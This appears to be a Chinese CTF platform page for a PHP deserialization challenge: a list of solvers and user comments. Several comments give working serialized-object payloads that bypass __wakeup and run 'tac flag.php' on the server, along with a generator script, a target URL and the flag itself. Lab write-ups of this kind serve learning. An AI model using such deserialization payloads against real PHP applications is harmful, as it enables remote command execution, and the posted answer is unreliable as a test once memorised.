评分(3)
解题动态
z723622533 攻破了该题 2天前
土豆班长 攻破了该题 4天前
854396873 攻破了该题 5天前
18283162726 攻破了该题 6天前
PDXX 攻破了该题 8天前
不在话下 攻破了该题 9天前
ssoocc 攻破了该题 10天前
H1uster 攻破了该题 13天前
2165518579牛逼 攻破了该题 13天前
biandanjun 攻破了该题 14天前
00zz 攻破了该题 14天前
chaojiikun 攻破了该题 15天前
海宝宝哈哈 攻破了该题 16天前
rookiee 攻破了该题 16天前
YYYyyy1234 攻破了该题 17天前
vicleet 攻破了该题 17天前
yym7 攻破了该题 18天前
Jokerz 攻破了该题 19天前
Yoruko39 攻破了该题 21天前
评论
LLTVLL 4月前
举报
AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。
Bojing 9月前
举报
有哪里提示了username是admin的吗
numberone 7月前
举报
源代码里不是有个if语句:if ($this->username === 'admin')
18956160518 10月前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
EtHat 1年前
举报
O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
xht0525 1年前
举报
nl flag.php|base64
不会编程的崽 1年前
举报
<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>
不会编程的崽 1年前
举报
O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}
c41vin 1年前
举报
0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6
wxy1343 1年前
举报
http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}
wxy1343 1年前
举报
flag{Unser1alize_and_2CE_Add}